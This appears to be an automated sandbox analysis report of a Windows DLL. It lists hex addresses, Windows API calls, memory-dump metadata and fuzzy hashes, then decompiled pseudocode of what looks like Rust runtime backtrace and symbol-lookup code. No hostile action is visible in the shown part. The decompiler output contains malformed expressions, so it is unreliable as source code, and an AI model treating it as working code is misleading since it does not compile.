                                                                                                                                                                                      0x6e9de54e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de554
                                                                                                                                                                                      0x6e9de554
                                                                                                                                                                                      0x6e9de55c
                                                                                                                                                                                      0x6e9de579
                                                                                                                                                                                      0x6e9de579
                                                                                                                                                                                      0x6e9de57b
                                                                                                                                                                                      0x6e9de581
                                                                                                                                                                                      0x6e9de585
                                                                                                                                                                                      0x6e9de5a7
                                                                                                                                                                                      0x6e9de5ab
                                                                                                                                                                                      0x6e9de5ad
                                                                                                                                                                                      0x6e9de5b5
                                                                                                                                                                                      0x6e9de5d7
                                                                                                                                                                                      0x6e9de5d7
                                                                                                                                                                                      0x6e9de5e1
                                                                                                                                                                                      0x6e9de5e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5b7
                                                                                                                                                                                      0x6e9de5c2
                                                                                                                                                                                      0x6e9de5ca
                                                                                                                                                                                      0x6e9de68d
                                                                                                                                                                                      0x6e9de690
                                                                                                                                                                                      0x6e9de6a6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5d0
                                                                                                                                                                                      0x6e9de5d0
                                                                                                                                                                                      0x6e9de5d2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5d2
                                                                                                                                                                                      0x6e9de5ca
                                                                                                                                                                                      0x6e9de587
                                                                                                                                                                                      0x6e9de592
                                                                                                                                                                                      0x6e9de59a
                                                                                                                                                                                      0x6e9de66a
                                                                                                                                                                                      0x6e9de66d
                                                                                                                                                                                      0x6e9de683
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5a0
                                                                                                                                                                                      0x6e9de5a0
                                                                                                                                                                                      0x6e9de5a2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5a2
                                                                                                                                                                                      0x6e9de59a
                                                                                                                                                                                      0x6e9de55e
                                                                                                                                                                                      0x6e9de564
                                                                                                                                                                                      0x6e9de56c
                                                                                                                                                                                      0x6e9de647
                                                                                                                                                                                      0x6e9de64a
                                                                                                                                                                                      0x6e9de660
                                                                                                                                                                                      0x6e9de6ae
                                                                                                                                                                                      0x6e9de6ae
                                                                                                                                                                                      0x6e9de6b4
                                                                                                                                                                                      0x6e9de6c3
                                                                                                                                                                                      0x6e9de572
                                                                                                                                                                                      0x6e9de572
                                                                                                                                                                                      0x6e9de574
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de574
                                                                                                                                                                                      0x6e9de56c
                                                                                                                                                                                      0x6e9de55c
                                                                                                                                                                                      0x6e9de52e
                                                                                                                                                                                      0x6e9de533
                                                                                                                                                                                      0x6e9de53a
                                                                                                                                                                                      0x6e9de53f
                                                                                                                                                                                      0x6e9de628
                                                                                                                                                                                      0x6e9de62d
                                                                                                                                                                                      0x6e9de632
                                                                                                                                                                                      0x6e9de637
                                                                                                                                                                                      0x6e9de646
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de53f
                                                                                                                                                                                      0x6e9de52c

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE520
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE533
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6E9DE564
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymSetOptions), ref: 6E9DE592
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymInitializeW), ref: 6E9DE5C2
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6E9DE5D7
                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE5F5
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6E9DE613
                                                                                                                                                                                        • Part of subcall function 6E9DE6D0: ReleaseMutex.KERNEL32(?,6E9DE448), ref: 6E9DE6D1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
                                                                                                                                                                                      • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                                                                                                                                                                                      • API String ID: 1067696788-3213342004
                                                                                                                                                                                      • Opcode ID: 16b8b74e016cac712cdc3effb368ad1c9d44980211bce3fa6e70ceb54f64f936
                                                                                                                                                                                      • Instruction ID: 74fcead3dc3e2a58ba607c7bffcf34030d8be35fcb0a6112f3eb22a8b0740c56
                                                                                                                                                                                      • Opcode Fuzzy Hash: 16b8b74e016cac712cdc3effb368ad1c9d44980211bce3fa6e70ceb54f64f936
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8941CE71E04B519FEF019FF48D547AAB7A8AF56314F488438E405BB380EB34D8868F62
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                                                      			E6E9DE6E0(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi) {
                                                                                                                                                                                      				void* _v16;
                                                                                                                                                                                      				char _v4528;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				char* _t225;
                                                                                                                                                                                      				void* _t234;
                                                                                                                                                                                      				void* _t237;
                                                                                                                                                                                      				signed int _t240;
                                                                                                                                                                                      				signed int _t243;
                                                                                                                                                                                      				signed char _t249;
                                                                                                                                                                                      				intOrPtr _t250;
                                                                                                                                                                                      				void* _t255;
                                                                                                                                                                                      				intOrPtr _t256;
                                                                                                                                                                                      				signed int _t258;
                                                                                                                                                                                      				signed char _t262;
                                                                                                                                                                                      				signed int _t265;
                                                                                                                                                                                      				signed short _t267;
                                                                                                                                                                                      				signed short* _t269;
                                                                                                                                                                                      				signed int _t273;
                                                                                                                                                                                      				void* _t277;
                                                                                                                                                                                      				void* _t278;
                                                                                                                                                                                      				intOrPtr _t279;
                                                                                                                                                                                      				signed int _t281;
                                                                                                                                                                                      				void* _t283;
                                                                                                                                                                                      				intOrPtr _t284;
                                                                                                                                                                                      				signed int _t286;
                                                                                                                                                                                      				signed short _t290;
                                                                                                                                                                                      				signed int _t292;
                                                                                                                                                                                      				signed short* _t293;
                                                                                                                                                                                      				signed short _t294;
                                                                                                                                                                                      				signed int _t297;
                                                                                                                                                                                      				signed int _t298;
                                                                                                                                                                                      				signed int _t301;
                                                                                                                                                                                      				signed int _t302;
                                                                                                                                                                                      				signed int _t304;
                                                                                                                                                                                      				signed int _t309;
                                                                                                                                                                                      				signed int _t310;
                                                                                                                                                                                      				signed int _t312;
                                                                                                                                                                                      				signed short* _t317;
                                                                                                                                                                                      				intOrPtr _t321;
                                                                                                                                                                                      				intOrPtr _t322;
                                                                                                                                                                                      				void* _t328;
                                                                                                                                                                                      				signed int _t330;
                                                                                                                                                                                      				intOrPtr _t333;
                                                                                                                                                                                      				signed int _t337;
                                                                                                                                                                                      				void* _t338;
                                                                                                                                                                                      				void* _t346;
                                                                                                                                                                                      				intOrPtr _t350;
                                                                                                                                                                                      				signed short* _t353;
                                                                                                                                                                                      				signed int _t354;
                                                                                                                                                                                      				signed int _t357;
                                                                                                                                                                                      				void* _t358;
                                                                                                                                                                                      				signed int _t365;
                                                                                                                                                                                      				void* _t366;
                                                                                                                                                                                      				signed short* _t369;
                                                                                                                                                                                      				signed int _t371;
                                                                                                                                                                                      				signed int _t373;
                                                                                                                                                                                      				signed short* _t379;
                                                                                                                                                                                      				signed int _t381;
                                                                                                                                                                                      				signed char _t384;
                                                                                                                                                                                      				signed char _t385;
                                                                                                                                                                                      				intOrPtr _t392;
                                                                                                                                                                                      				signed int* _t393;
                                                                                                                                                                                      				signed char _t394;
                                                                                                                                                                                      				signed int _t397;
                                                                                                                                                                                      				signed char _t398;
                                                                                                                                                                                      				signed int _t399;
                                                                                                                                                                                      				signed int _t400;
                                                                                                                                                                                      				signed short _t401;
                                                                                                                                                                                      				signed int _t407;
                                                                                                                                                                                      				signed int _t409;
                                                                                                                                                                                      				signed char _t410;
                                                                                                                                                                                      				signed int _t411;
                                                                                                                                                                                      				signed short _t412;
                                                                                                                                                                                      				signed int _t418;
                                                                                                                                                                                      				intOrPtr _t421;
                                                                                                                                                                                      				signed int _t423;
                                                                                                                                                                                      				signed int _t424;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t365 = __edx;
                                                                                                                                                                                      				_t321 = __ecx;
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                      				_t424 = _t423 & 0xfffffff0;
                                                                                                                                                                                      				E6E9EC6C0(0x11b0);
                                                                                                                                                                                      				_t418 = _t424;
                                                                                                                                                                                      				 *((intOrPtr*)(_t418 + 0x1198)) = _t421;
                                                                                                                                                                                      				 *(_t418 + 0x119c) = _t424;
                                                                                                                                                                                      				 *(_t418 + 0x11a8) = 0xffffffff;
                                                                                                                                                                                      				 *((intOrPtr*)(_t418 + 0x11a4)) = E6E9E3A00;
                                                                                                                                                                                      				 *((intOrPtr*)(_t418 + 0x11a0)) =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] = _t418 + 0x11a0;
                                                                                                                                                                                      				 *((intOrPtr*)(_t418 + 0x5c)) = __edx;
                                                                                                                                                                                      				_t225 =  *((intOrPtr*)(__ecx));
                                                                                                                                                                                      				if( *_t225 != 0 ||  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))) <= 0x64) {
                                                                                                                                                                                      					_t392 =  *((intOrPtr*)(_t321 + 8));
                                                                                                                                                                                      					_t301 =  *(_t321 + 0xc);
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x80)) = _t321;
                                                                                                                                                                                      					_t322 =  *((intOrPtr*)(_t321 + 0x10));
                                                                                                                                                                                      					 *(_t418 + 0x1c) = _t365;
                                                                                                                                                                                      					_t366 = _t418 + 0x12;
                                                                                                                                                                                      					 *(_t418 + 0x12) = 0;
                                                                                                                                                                                      					 *((char*)(_t418 + 0x13)) = 0;
                                                                                                                                                                                      					 *(_t418 + 0x84) = _t366;
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x88)) = _t225;
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x8c)) = _t392;
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x90)) = _t418 + 0x13;
                                                                                                                                                                                      					 *(_t418 + 0x94) = _t301;
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x98)) = _t322;
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x7c)) = _t392;
                                                                                                                                                                                      					 *(_t418 + 0x58) = _t301;
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x78)) = _t322;
                                                                                                                                                                                      					 *((intOrPtr*)(_t418 + 0x9c)) = _t418 + 0x5c;
                                                                                                                                                                                      					if(E6E9DE4E0(_t301, _t392, _t418) == 0) {
                                                                                                                                                                                      						_t393 =  *(_t418 + 0x1c);
                                                                                                                                                                                      						 *(_t418 + 0x2c) = _t366;
                                                                                                                                                                                      						__eflags =  *_t393 ^ 0x00000001 | _t393[1];
                                                                                                                                                                                      						if(( *_t393 ^ 0x00000001 | _t393[1]) != 0) {
                                                                                                                                                                                      							E6E9EE9D0(_t393, _t418 + 0x1a4, 0, 0xff4);
                                                                                                                                                                                      							_t424 = _t424 + 0xc;
                                                                                                                                                                                      							_t302 =  *0x6ea2e15c; // 0x0
                                                                                                                                                                                      							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
                                                                                                                                                                                      							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
                                                                                                                                                                                      							__eflags = _t302;
                                                                                                                                                                                      							if(_t302 != 0) {
                                                                                                                                                                                      								L33:
                                                                                                                                                                                      								_t234 = GetCurrentProcess();
                                                                                                                                                                                      								_t394 = _t393[0x45];
                                                                                                                                                                                      								 *(_t418 + 0x18) = _t234;
                                                                                                                                                                                      								 *(_t418 + 0xa4) = 0;
                                                                                                                                                                                      								 *(_t418 + 0xa0) = 0;
                                                                                                                                                                                      								_t369 =  <  ? 0 : _t393[2] - 1;
                                                                                                                                                                                      								 *(_t418 + 0x20) = _t394;
                                                                                                                                                                                      								 *(_t418 + 0x30) = _t369;
                                                                                                                                                                                      								_t237 =  *_t302( *(_t418 + 0x18), _t369, 0, _t394, _t418 + 0xa0, _t418 + 0x1a0);
                                                                                                                                                                                      								__eflags = _t237 - 1;
                                                                                                                                                                                      								if(_t237 != 1) {
                                                                                                                                                                                      									goto L75;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t250 =  *((intOrPtr*)(_t418 + 0x1ec));
                                                                                                                                                                                      									asm("xorps xmm0, xmm0");
                                                                                                                                                                                      									_t304 = _t418 + 0x1f4;
                                                                                                                                                                                      									_t371 = _t418 + 0xa0;
                                                                                                                                                                                      									 *(_t418 + 0xc) = 0;
                                                                                                                                                                                      									asm("movaps [esi+0x190], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x180], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x170], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x160], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x150], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x140], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x130], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x120], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x110], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x100], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xf0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xe0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xd0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xc0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xb0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xa0], xmm0");
                                                                                                                                                                                      									_t328 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
                                                                                                                                                                                      									__eflags = _t250 - _t328;
                                                                                                                                                                                      									_t329 =  <=  ? _t250 : _t328;
                                                                                                                                                                                      									_t330 = 0;
                                                                                                                                                                                      									 *(_t418 + 0x14) = _t418 + 0x1f4 + ( <=  ? _t250 : _t328) * 2;
                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                      									 *(_t418 + 0x18) = 0x100;
                                                                                                                                                                                      									if(0 == 0) {
                                                                                                                                                                                      										L37:
                                                                                                                                                                                      										__eflags = _t304 -  *(_t418 + 0x14);
                                                                                                                                                                                      										if(_t304 !=  *(_t418 + 0x14)) {
                                                                                                                                                                                      											_t400 = _t304;
                                                                                                                                                                                      											_t304 = _t304 + 2;
                                                                                                                                                                                      											__eflags = _t304;
                                                                                                                                                                                      											_t401 =  *_t400 & 0x0000ffff;
                                                                                                                                                                                      											goto L39;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										asm("o16 nop [cs:eax+eax]");
                                                                                                                                                                                      										L36:
                                                                                                                                                                                      										_t401 = _t330 >> 0x10;
                                                                                                                                                                                      										L39:
                                                                                                                                                                                      										 *(_t418 + 0x1c) = _t330 & 0xffff0000;
                                                                                                                                                                                      										__eflags = (_t401 & 0x0000f800) - 0xd800;
                                                                                                                                                                                      										if((_t401 & 0x0000f800) != 0xd800) {
                                                                                                                                                                                      											 *(_t418 + 0x24) = _t304;
                                                                                                                                                                                      											_t337 = _t401 & 0x0000ffff;
                                                                                                                                                                                      											_t262 = 0;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t269 = _t304;
                                                                                                                                                                                      											_t337 = 0;
                                                                                                                                                                                      											__eflags = (_t401 & 0x0000ffff) - 0xdbff;
                                                                                                                                                                                      											if((_t401 & 0x0000ffff) <= 0xdbff) {
                                                                                                                                                                                      												_t309 =  *(_t418 + 0x14);
                                                                                                                                                                                      												__eflags = _t269 - _t309;
                                                                                                                                                                                      												if(_t269 == _t309) {
                                                                                                                                                                                      													 *(_t418 + 0x24) = _t309;
                                                                                                                                                                                      													goto L48;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t310 =  *_t269 & 0x0000ffff;
                                                                                                                                                                                      													 *(_t418 + 0x24) =  &(_t269[1]);
                                                                                                                                                                                      													 *(_t418 + 0x28) = _t310;
                                                                                                                                                                                      													__eflags = (_t310 & 0x0000fc00) - 0xdc00;
                                                                                                                                                                                      													if((_t310 & 0x0000fc00) != 0xdc00) {
                                                                                                                                                                                      														 *(_t418 + 0x1c) = ( *(_t418 + 0x28) & 0x0000ffff) << 0x00000010 | 0x00000001;
                                                                                                                                                                                      														asm("o16 nop [eax+eax]");
                                                                                                                                                                                      														goto L48;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														_t262 = 0;
                                                                                                                                                                                      														_t337 = ( *(_t418 + 0x28) + 0x00002400 & 0x0000ffff | (_t401 + 0x00002800 & 0x0000ffff) << 0x0000000a) + 0x10000;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(_t418 + 0x24) = _t269;
                                                                                                                                                                                      												L48:
                                                                                                                                                                                      												_t262 = 1;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t304 =  *(_t418 + 0x18);
                                                                                                                                                                                      										__eflags = _t262 & 0x00000001;
                                                                                                                                                                                      										_t394 = 1;
                                                                                                                                                                                      										_t338 =  !=  ? 0xfffd : _t337;
                                                                                                                                                                                      										__eflags = _t338 - 0x80;
                                                                                                                                                                                      										if(_t338 >= 0x80) {
                                                                                                                                                                                      											_t394 = 2;
                                                                                                                                                                                      											__eflags = _t338 - 0x800;
                                                                                                                                                                                      											if(_t338 >= 0x800) {
                                                                                                                                                                                      												__eflags = _t338 - 0x10000;
                                                                                                                                                                                      												_t394 = 4;
                                                                                                                                                                                      												asm("sbb edi, 0x0");
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t265 = _t304 - _t394;
                                                                                                                                                                                      										__eflags = _t265;
                                                                                                                                                                                      										 *(_t418 + 0x28) = _t265;
                                                                                                                                                                                      										if(_t265 > 0) {
                                                                                                                                                                                      											 *(_t418 + 0x34) = _t394;
                                                                                                                                                                                      											 *(_t418 + 0x11a8) = 0;
                                                                                                                                                                                      											 *(_t418 + 0x18) = _t371;
                                                                                                                                                                                      											E6E9DDB50(_t304, _t338, _t371, _t394, _t418, _t421, _t304);
                                                                                                                                                                                      											_t424 = _t424 + 4;
                                                                                                                                                                                      											_t267 =  *(_t418 + 0x34);
                                                                                                                                                                                      											_t330 =  *(_t418 + 0x1c);
                                                                                                                                                                                      											_t304 =  *(_t418 + 0x24);
                                                                                                                                                                                      											_t371 =  *(_t418 + 0x18) + _t267;
                                                                                                                                                                                      											 *(_t418 + 0xc) =  *(_t418 + 0xc) + _t267;
                                                                                                                                                                                      											__eflags = _t330;
                                                                                                                                                                                      											 *(_t418 + 0x18) =  *(_t418 + 0x28);
                                                                                                                                                                                      											if(_t330 != 0) {
                                                                                                                                                                                      												goto L36;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(_t418 + 0xc) - 0x101;
                                                                                                                                                                                      									if(__eflags >= 0) {
                                                                                                                                                                                      										 *(_t418 + 0x11a8) = 0;
                                                                                                                                                                                      										E6E9F9470(_t304,  *(_t418 + 0xc), 0x100, _t394, _t418, __eflags, 0x6ea209ec);
                                                                                                                                                                                      										goto L87;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t397 =  *0x6ea2e160; // 0x0
                                                                                                                                                                                      										asm("xorps xmm0, xmm0");
                                                                                                                                                                                      										 *(_t418 + 0x74) = 0;
                                                                                                                                                                                      										 *(_t418 + 0x70) = 0;
                                                                                                                                                                                      										asm("movaps [esi+0x60], xmm0");
                                                                                                                                                                                      										 *((intOrPtr*)(_t418 + 0x60)) = 0x18;
                                                                                                                                                                                      										__eflags = _t397;
                                                                                                                                                                                      										if(_t397 != 0) {
                                                                                                                                                                                      											L67:
                                                                                                                                                                                      											_t255 = GetCurrentProcess();
                                                                                                                                                                                      											_t333 = _t418 + 0x60;
                                                                                                                                                                                      											 *(_t418 + 0x38) = 0;
                                                                                                                                                                                      											_t373 = _t418 + 0x38;
                                                                                                                                                                                      											_t256 =  *_t397(_t255,  *(_t418 + 0x30), 0,  *(_t418 + 0x20), 0, 0, _t373, _t333);
                                                                                                                                                                                      											__eflags = _t256 - 1;
                                                                                                                                                                                      											if(_t256 != 1) {
                                                                                                                                                                                      												_t398 = 0;
                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t256 =  *((intOrPtr*)(_t418 + 0x68));
                                                                                                                                                                                      												_t333 =  *((intOrPtr*)(_t418 + 0x6c));
                                                                                                                                                                                      												_t399 = 0;
                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                      												asm("o16 nop [cs:eax+eax]");
                                                                                                                                                                                      												do {
                                                                                                                                                                                      													_t373 = _t399;
                                                                                                                                                                                      													_t399 = _t399 + 1;
                                                                                                                                                                                      													__eflags =  *((short*)(_t333 + _t373 * 2));
                                                                                                                                                                                      												} while ( *((short*)(_t333 + _t373 * 2)) != 0);
                                                                                                                                                                                      												 *(_t418 + 0x11a8) = 0;
                                                                                                                                                                                      												_t398 = 1;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t418 + 0x11a8) = 0;
                                                                                                                                                                                      											 *(_t418 + 0x38) = _t418 + 0xa0;
                                                                                                                                                                                      											 *(_t418 + 0x3c) =  *(_t418 + 0xc);
                                                                                                                                                                                      											 *((intOrPtr*)(_t418 + 0x40)) =  *((intOrPtr*)(_t418 + 0x1d8));
                                                                                                                                                                                      											 *(_t418 + 0x44) = _t398;
                                                                                                                                                                                      											 *((intOrPtr*)(_t418 + 0x48)) = _t256;
                                                                                                                                                                                      											 *(_t418 + 0x4c) = _t398;
                                                                                                                                                                                      											 *((intOrPtr*)(_t418 + 0x50)) = _t333;
                                                                                                                                                                                      											 *(_t418 + 0x54) = _t373;
                                                                                                                                                                                      											E6E9DF860(_t418 + 0x84, _t418 + 0x38);
                                                                                                                                                                                      											goto L75;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t258 = GetProcAddress( *0x6ea2e130, "SymGetLineFromInlineContextW");
                                                                                                                                                                                      											__eflags = _t258;
                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                      												 *(_t418 + 0x11a8) = 0;
                                                                                                                                                                                      												E6E9F94E0(_t304, "called `Option::unwrap()` on a `None` value", 0x2b, _t397, _t418, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      												goto L87;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t397 = _t258;
                                                                                                                                                                                      												 *0x6ea2e160 = _t258;
                                                                                                                                                                                      												goto L67;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t273 = GetProcAddress( *0x6ea2e130, "SymFromInlineContextW");
                                                                                                                                                                                      								__eflags = _t273;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									 *(_t418 + 0x11a8) = 0;
                                                                                                                                                                                      									E6E9F94E0(_t302, "called `Option::unwrap()` on a `None` value", 0x2b, _t393, _t418, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      									goto L87;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t302 = _t273;
                                                                                                                                                                                      									 *0x6ea2e15c = _t273;
                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t312 = _t393[2];
                                                                                                                                                                                      							E6E9EE9D0(_t393, _t418 + 0x1a4, 0, 0xff4);
                                                                                                                                                                                      							_t424 = _t424 + 0xc;
                                                                                                                                                                                      							_t407 =  *0x6ea2e150; // 0x0
                                                                                                                                                                                      							 *((intOrPtr*)(_t418 + 0x1f0)) = 0x7d0;
                                                                                                                                                                                      							 *((intOrPtr*)(_t418 + 0x1a0)) = 0x58;
                                                                                                                                                                                      							__eflags = _t407;
                                                                                                                                                                                      							if(_t407 != 0) {
                                                                                                                                                                                      								L9:
                                                                                                                                                                                      								_t277 = GetCurrentProcess();
                                                                                                                                                                                      								 *(_t418 + 0xa4) = 0;
                                                                                                                                                                                      								 *(_t418 + 0xa0) = 0;
                                                                                                                                                                                      								_t278 =  *_t407(_t277, _t312, 0, _t418 + 0xa0, _t418 + 0x1a0);
                                                                                                                                                                                      								__eflags = _t278 - 1;
                                                                                                                                                                                      								if(_t278 != 1) {
                                                                                                                                                                                      									L75:
                                                                                                                                                                                      									ReleaseMutex( *(_t418 + 0x2c));
                                                                                                                                                                                      									__eflags =  *((char*)(_t418 + 0x13));
                                                                                                                                                                                      									if( *((char*)(_t418 + 0x13)) != 0) {
                                                                                                                                                                                      										goto L4;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L76;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L80;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t279 =  *((intOrPtr*)(_t418 + 0x1ec));
                                                                                                                                                                                      									asm("xorps xmm0, xmm0");
                                                                                                                                                                                      									_t408 = 0x100;
                                                                                                                                                                                      									 *(_t418 + 0x20) = 0;
                                                                                                                                                                                      									 *(_t418 + 0x14) = _t312;
                                                                                                                                                                                      									asm("movaps [esi+0x190], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x180], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x170], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x160], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x150], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x140], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x130], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x120], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x110], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0x100], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xf0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xe0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xd0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xc0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xb0], xmm0");
                                                                                                                                                                                      									asm("movaps [esi+0xa0], xmm0");
                                                                                                                                                                                      									_t346 =  *((intOrPtr*)(_t418 + 0x1f0)) - 1;
                                                                                                                                                                                      									__eflags = _t279 - _t346;
                                                                                                                                                                                      									_t347 =  <=  ? _t279 : _t346;
                                                                                                                                                                                      									_t379 = _t418 + 0x1f4 + ( <=  ? _t279 : _t346) * 2;
                                                                                                                                                                                      									 *(_t418 + 0xc) = _t418 + 0x1f4;
                                                                                                                                                                                      									_t281 = 0;
                                                                                                                                                                                      									 *(_t418 + 0x30) = _t379;
                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                      									 *(_t418 + 0x1c) = _t418 + 0xa0;
                                                                                                                                                                                      									 *(_t418 + 0x28) = 0x100;
                                                                                                                                                                                      									if(0 == 0) {
                                                                                                                                                                                      										L13:
                                                                                                                                                                                      										__eflags =  *(_t418 + 0xc) - _t379;
                                                                                                                                                                                      										if( *(_t418 + 0xc) != _t379) {
                                                                                                                                                                                      											_t353 =  *(_t418 + 0xc);
                                                                                                                                                                                      											_t412 =  *_t353 & 0x0000ffff;
                                                                                                                                                                                      											_t354 =  &(_t353[1]);
                                                                                                                                                                                      											__eflags = _t354;
                                                                                                                                                                                      											 *(_t418 + 0xc) = _t354;
                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										L12:
                                                                                                                                                                                      										_t412 = _t281 >> 0x10;
                                                                                                                                                                                      										L15:
                                                                                                                                                                                      										 *(_t418 + 0x18) = _t281 & 0xffff0000;
